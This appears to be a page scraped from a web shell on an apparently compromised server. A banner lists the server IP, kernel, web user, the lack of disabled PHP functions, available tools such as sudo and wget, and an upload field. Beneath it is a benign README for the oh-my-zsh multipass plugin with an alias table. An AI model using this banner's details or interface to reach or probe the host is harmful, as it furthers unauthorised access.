| Server IP : 164.138.27.172 / Your IP : 216.73.216.143 Web Server : nginx/1.27.4 System : Linux cookingdream 6.8.0-124-generic #124-Ubuntu SMP PREEMPT_DYNAMIC Tue May 26 13:00:45 UTC 2026 x86_64 User : www-adm ( 1001) PHP Version : 8.3.32 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : OFF | Sudo : ON | Pkexec : OFF Directory : /home/jonasn/.oh-my-zsh/plugins/multipass/ |
Upload File : |
# multipass This plugin provides completion for [multipass](https://multipass.run), as well as aliases for multipass commands. To use it, add `multipass` to the plugins array in your zshrc file: ```zsh plugins=(... multipass) ``` ## Aliases | Alias | Command | | ------ | ------------------------------------------------------------------- | | `mp` | `multipass` | | `mpl` | `multipass list` | | `mpla` | `multipass launch` | | `mpln` | `multipass launch --network en0 --network name=bridge0,mode=manual` | | `mps` | `multipass shell` | | `mpsp` | `multipass stop` | | `mpst` | `multipass start` |